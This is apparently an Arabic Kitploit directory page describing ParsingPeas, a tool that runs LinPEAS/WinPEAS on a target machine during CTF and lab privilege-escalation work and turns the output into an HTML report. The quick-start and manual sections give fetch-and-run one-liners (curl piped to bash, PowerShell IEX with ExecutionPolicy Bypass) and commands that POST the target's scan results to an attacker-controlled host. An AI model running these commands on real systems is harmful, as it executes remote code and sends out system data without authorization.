Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
ParsingPeas — محلل HTML لمخرجات PEAS مع ميزات إضافية | Kitploit
أدوات/GitHubGitHub/yuvalmil/parsingpeas
تصعيد الامتيازاتالبرمجة النصية والأتمتةجمع المعلوماتما بعد الاستغلالCTFاختبار الاختراقالأدوات والمكوناتالتعلم والتعليممختبرات وتدريب عملي
GitHubyuvalmil/parsingpeas

ParsingPeas

محلل HTML لمخرجات PEAS مع ميزات إضافية

15914منذ شهر واحدتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

ParsingPeas 🥒

جمع تلقائي لـ PEASS + تقرير HTML محمول ونظيف لأعمال رفع الامتيازات في CTF والمختبرات.

الترخيص: MIT Python 3.8+

قم بتشغيل أمر واحد على الهدف. يقوم ParsingPeas بسحب LinPEAS/WinPEAS من جهاز Kali الخاص بك، ويُجري الفحص، ويعيد الإخراج، ويحوله إلى تقرير HTML مكتفٍ ذاتياً واحد يمكنك قراءته والبحث فيه وفرزه والاحتفاظ به — لا حاجة لنقل الملفات يدوياً ولا إنترنت على الهدف.


لقطات الشاشة

ملخص التقرير — الأقسام مجمعة حسب فئات LinPEAS الخاصة، مع نقاط النتائج وشريط النتائج:

ملخص التقرير

النتائج فقط — نقرة واحدة تُفلتر التقرير والشريط الجانبي إلى الأقسام التي تحتوي على نتائج حرجة/عالية:

النتائج فقط

الإخراج الطرفي الكامل — الفحص الكامل ذو الألوان المخلصة؛ يمكن البحث فيه باستخدام Ctrl-F:

الإخراج الطرفي الكامل


لماذا

الإخراج الخام لـ PEASS هو جدار من النص الطرفي المتدرج الذي يختفي حالما يموت شلك. يقوم ParsingPeas:

  • بأتمتة العمل الشاق — لا حاجة لـ scp، أو استضافة linpeas بنفسك، أو نسخ ولصق الإخراج إلى Kali.
  • بحفظه — كل فحص يصبح تقرير HTML بختم زمني على جهازك.
  • يجعله قابلاً للتنقل — يُقسم الإخراج إلى أقسام LinPEAS الحقيقية مع شريط جانبي مصنف، وإبراز النتائج، وبحث النص الكامل.
  • يسافر جيداً — كل تقرير هو ملف .html واحد مكتفٍ ذاتياً يمكنك نسخه خارج الجهاز، أو أرشفته، أو فتحه بدون اتصال بالنقر المزدوج.

إنه عرض + لوجستيات، وليس محرك استغلال: فهو يحافظ بأمانة على ألوان PEASS ونتائجه بدلاً من إعادة تقييمها.


الميزات

  • سير عمل بأمر واحد — الهدف يُنزّل المُغلف من جهازك، ويُشغّل PEASS، ويرسل النتيجة مرة أخرى تلقائياً عبر POST.
  • يعمل بدون اتصال على الهدف — كل شيء يُقدّم من جهاز Kali الخاص بك.
  • تحليل أقسام دقيق — يتبع هيكل العناوين ذو المستويين الحقيقي لـ LinPEAS (الأقسام الرئيسية + الفحوصات الفرعية)؛ تبقى روابط hacktricks وأسطر الفحص كمحتوى بدلاً من تلويث جدول المحتويات.
  • تقارير مكتفية ذاتياً — الإخراج الطرفي مُضمن في النص؛ ملف واحد، لا ملفات مساعدة، يُفتح عبر file://.
  • عرض تقرير تفاعلي:
    • شريط جانبي لقائمة المحتويات مجمع حسب أقسام PEASS الخاصة، مع أعداد النتائج الحرجة/العالية.
    • شريط النتائج — شرائح N حرجة / N عالية تقفز بين الأقسام المحددة، بالإضافة إلى وسيلة إيضاح بالألوان.
    • فلتر النتائج فقط للفرز السريع.
    • تبديل التفاف النص (مفعل افتراضياً — لا مزيد من الأسطر المقطوعة).
    • Spy التمرير — القسم الحالي مظلل في قائمة المحتويات أثناء التمرير.
    • عناوين أقسام ثابتة ونقاط "وضع علامة كمقروء" تستمر (localStorage، لكل تقرير).
    • شارات رأس للمستخدم الحالي (حمراء إذا كان الجذر) ونظام التشغيل.
  • علامة تبويب الإخراج الطرفي الكامل — الفحص الكامل ذو الألوان الكاملة، مُقدم في مسار واحد حتى يبحث Ctrl-F في المتصفح في كله.
  • سمة داكنة هادئة — مريحة للعين للجلسات الطويلة.
  • لينكس وويندوز — LinPEAS (bash) و WinPEAS (PowerShell).

البداية السريعة

على جهاز Kali الخاص بك

root@kitploit:~
git clone https://github.com/YuvalMil/ParsingPeas.git
cd ParsingPeas
./setup.sh                      # يُنزّل LinPEAS + WinPEAS إلى scripts/
pip3 install -r requirements.txt
python3 receiver.py             # يعمل على http://0.0.0.0:8005

اترك receiver.py قيد التشغيل. اعثر على IP الذي سيصل إليك به الهدف:

  • HTB / VPN: عنوان tun0 الخاص بك — ip -4 addr show tun0
  • الشبكة المحلية: IP الواجهة العادية الخاصة بك

على الهدف

لينكس/يونكس (يستخدم curl، يعود إلى wget):

root@kitploit:~
curl -sSL http://YOUR_KALI_IP:8005/get-script | bash

ويندوز (PowerShell / شل عكسي):

root@kitploit:~
powershell -ExecutionPolicy Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('http://YOUR_KALI_IP:8005/get-script.ps1')"

اختر الأمر الواحد الذي يطابق نظام تشغيل الهدف — لينكس يقدّم LinPEAS، ويندوز يقدّم WinPEAS.

عرض التقرير

يتم إنشاء التقارير على جهاز Kali الخاص بك في ./reports/. إما:

  • تصفح الفهرس في http://YOUR_KALI_IP:8005 وانقر على تقرير، أو
  • افتح الملف المُنشأ مباشرة — إنه مكتفٍ ذاتياً:
    root@kitploit:~
    xdg-open ./reports/report_<host>_<timestamp>.html
    

انسخ ملف .html الواحد هذا إلى أي مكان تريده؛ إنه يعمل بمفرده.


كيف يعمل

root@kitploit:~
الهدف → يُنزّل المُغلف من Kali → يُشغّل PEASS → يُرسل الإخراج عبر POST → Kali يُحلل → تقرير HTML مكتفٍ ذاتياً

الهدف لا يحتاج أبداً إلى اتصال بالإنترنت — المُغلف وثنائيات PEASS كلها تُقدّم من جهازك.


استخدام التقرير

  • علامة تبويب ملخص التقرير — الأقسام مجمعة حسب فئة PEASS في الشريط الجانبي. النقاط الحمراء/الصفراء تُميز الأقسام ذات النتائج الحرجة/العالية. استخدم شرائح النتائج للقفز مباشرة إليها، أو النتائج فقط لإخفاء كل شيء آخر.
  • علامة تبويب الإخراج الطرفي الكامل — الفحص الملون الكامل. اضغط فقط على Ctrl-F للبحث؛ يتم عرض الإخراج بالكامل، لذا يغطي البحث الأصلي كله.
  • انقر على نقطة نتيجة لتحديد قسم كمقروء — يبقى مقروءاً عند إعادة فتح التقرير.

الاستخدام اليدوي

إذا فشل الأمر الواحد، قم بذلك يدوياً.

لينكس:

root@kitploit:~
# على الهدف
curl http://KALI_IP:8005/get-linpeas -o /tmp/lp.sh
chmod +x /tmp/lp.sh
/tmp/lp.sh > /tmp/out.txt
# أرسل مرة أخرى
curl -X POST -H "X-Hostname: $(hostname)" -H "X-Scan-Type: linpeas" \
  --data-binary @/tmp/out.txt http://KALI_IP:8005/upload

ويندوز (PowerShell):

root@kitploit:~
Invoke-WebRequest -Uri http://KALI_IP:8005/get-winpeas -OutFile $env:TEMP\wp.exe
& "$env:TEMP\wp.exe" > $env:TEMP\out.txt
Invoke-WebRequest -Uri http://KALI_IP:8005/upload -Method POST `
  -Headers @{"X-Hostname"=$env:COMPUTERNAME; "X-Scan-Type"="winpeas"} `
  -InFile $env:TEMP\out.txt

تحليل تفريغ PEASS لديك بالفعل:

root@kitploit:~
python3 parser.py /path/to/peas_output.txt   # يكتب تقرير HTML إلى ./reports/

الإعدادات

قم بتحرير بداية receiver.py:


استكشاف الأخطاء وإصلاحها

  • لا يمكن تنزيل البرنامج النصي؟ curl http://KALI_IP:8005/health للتحقق من الاتصال؛ افتح الجدار الناري بـ sudo ufw allow 8005/tcp.
  • خطأ 404 على /get-linpeas؟ قم بتشغيل ./setup.sh لجلب ثنائيات PEASS.
  • لا يوجد إخراج حي في شل PowerShell العكسي؟ متوقع — الفحص لا يزال يعمل؛ راقب مستقبلك لتأكيد الرفع.

الأمان

⚠️ للاستخدام المصرح به لاختبار الاختراق، وCTF، والمختبرات فقط.

  • لا مصادقة — قم بتشغيله فقط على شبكات معزولة/CTF، خلف جدار ناري.
  • يتم تعقيم قيم رأس الرفع ويتم تحديد حجم الرفع، لكن الخادم غير محصن للتعرض للإنترنت العدائي.

الشكر

مبني على PEASS-ng بواسطة @carlospolop. يقوم ParsingPeas فقط بجمع وعرض إخراجه.


رخصة MIT · المساهمات مرحب بها

تنزيل الأداة
الإعدادالافتراضيملاحظات
المنفذ8005غيّر سطر app.run(... port=...)
OUTPUT_DIR./received_outputsالفحوصات الخام المرفوعة
REPORTS_DIR./reportsتقارير HTML المُنشأة
SCRIPTS_DIR./scriptsثنائيات LinPEAS/WinPEAS
MAX_UPLOAD_SIZE10 MBمفروض — الرفع الأكبر يحصل على HTTP 413